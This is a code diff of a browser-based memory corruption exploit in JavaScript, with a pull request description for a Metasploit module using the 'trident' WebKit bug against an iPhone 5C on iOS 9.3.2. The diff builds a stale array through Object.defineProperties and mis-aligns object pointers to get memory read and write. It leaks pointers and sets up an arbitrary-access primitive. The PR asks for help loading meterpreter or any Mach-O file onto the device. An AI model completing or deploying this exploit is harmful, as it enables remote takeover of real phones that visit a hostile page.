-    value: 2
-   },
-   p3: {
-    value: 3
-   },
-   p4: {
-    value: 4
-   },
-   p5: {
-    value: 5
-   },
-   p6: {
-    value: 6
-   },
-   p7: {
-    value: 7
-   },
-   p8: {
-    value: 8
-   },
-   length: {
-    value: not_number
-   },
-   stale: {
-    value: arr
-   },
-   after: {
-    value: 666
-   }
+    p0 : { value : 0 },
+    p1 : { value : 1 },
+    p2 : { value : 2 },
+    p3 : { value : 3 },
+    p4 : { value : 4 },
+    p5 : { value : 5 },
+    p6 : { value : 6 },
+    p7 : { value : 7 },
+    p8 : { value : 8 },
+    length : { value : not_number },
+    stale : { value : arr },
+    after : { value : 666 }
   };
+
   var target = [];
   var stale = 0;
+  var before_len = arr.length;
   Object.defineProperties(target, props);
   stale = target.stale;
-  stale[0] += 0x101;
-  stale[1] = {}
-  for (var z = 0; z < 0x1000; z++) fc();
-  for (i = 0; i < bufs.length; i++) {
-   for (k = 0; k < bufs[0].length; k++) {
-    if (bufs[i][k] == 0x41414242) {
-     stale[0] = fc;
-     fcp = bufs[i][k];
-     stale[0] = {
-      'a': u2d(105, 0),
-      'b': u2d(0, 0),
-      'c': smsh,
-      'd': u2d(0x100, 0)
-     }
-     stale[1] = stale[0]
-     bufs[i][k] += 0x10; // misalign so we end up in JSObject's properties, which have a crafted Uint32Array pointing to smsh
-     bck = stale[0][4];
-     stale[0][4] = 0; // address, low 32 bits
-     // stale[0][5] = 1; // address, high 32 bits == 0x100000000
-     stale[0][6] = 0xffffffff;
-     mem0 = stale[0];
-     mem1 = bck;
-     mem2 = smsh;
-     bufs.push(stale)
-     if (smsh.length != 0x10) {
-      smashed(stale[0]);
-     }
-     return;
-    }
-   }
-  }
-  setTimeout(function() {
-    document.location.reload();
-  }, 2000);
- }
 
-dgc();
+  if (stale.length != 0x41414141){
+    setTimeout(function () {
+      location.reload();
+    }, 200);
+    return;
+  }
+
+  var obuf = new Uint32Array(2);
+  obuf[0] = 0x41414141;
+  obuf[1] = 0xffff0000;
+
+  stale[0] = 0x12345678;
+  stale[1] = {};
+
+  for(var z=0; z<0x100; z++) fc();
+
+  console.log("pre array");
+  for (i=0; i < bufs.length; i++) {
+    var dobreak = 0;
+    for (k=0; k < bufs[0].length; k++){
+        if(bufs[i][k] != obuf[k%2]){
+
+        console.log("bufs[i][k]  =0x"+bufs[i][k].toString(16));
+        console.log("bufs[i][k+1]=0x"+bufs[i][k+1].toString(16));
+
+        stale[0] = fc;
+        fcp = bufs[i][k];
+
+        stale[0] = smsh;
+        var ptrsmsh = bufs[i][k];
+
+        stale[2] = {'a':u2d(0x2,0x10),'b':smsh, 'c':u2d(0,0), 'd':u2d(0,0)}
+        stale[0] = {'a':u2d(0,0x00e00600),'b':u2d(1,0x10), 'c':u2d(bufs[i][k+2*2]+0x10,0), 'd':u2d(0,0)}
+        stale[1] = stale[0];
+        bufs[i][k] += 0x10; // misalign so we end up in JSObject's properties, which have a crafted Uint32Array pointing to smsh
+        var leak = stale[0][0].charCodeAt(0);
+            leak += stale[0][1].charCodeAt(0) << 8;
+            leak += stale[0][2].charCodeAt(0) << 16;
+            leak += stale[0][3].charCodeAt(0) << 24;
+        console.log("leakptr=0x"+leak.toString(16));
+        bufs[i][k] -= 0x10;
+        stale[0] = {'a':u2d(leak,0x00602300), 'b':u2d(0,0), 'c':smsh, 'd':u2d(0,0)}
+        stale[1] = stale[0];
+        bufs[i][k] += 0x10; // misalign so we end up in JSObject's properties, which have a crafted Uint32Array pointing to smsh
+        stale[0][4] = 0;
+        stale[0][5] = 0xffffffff;
+        bufs[i][k] -= 0x10;
+
+        mem0 = stale[0];
+        mem2 = smsh;
+        if (smsh.length != 0x10) {
+          smashed();
+        }
+        dobreak = 1;
+        break;
+       }
+     }
+     if (dobreak) break;
+   }
+
+  console.log("end");
+}
+
 setTimeout(go_, 200);
+
 </script>
 </body>
 </html>


### PR DESCRIPTION
I'm pushing a work in progress attempt to exploit an iPhone 5C running iOS 9.3.2 using the trident exploit.
I'm stuck on the final part which is loading meterpreter (or any arbitrary macho file). 
Any help would be much appreciated!

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/apple_ios/browser/webkit_trident`
- [ ] `exploit`
- [ ] Visit the hosted website on a vulnerable device.
- [ ] **Verify** You see "hello from metasploit" in the device log.
- [ ] **TODO** Figure out how stage meterpreter or any macho file.

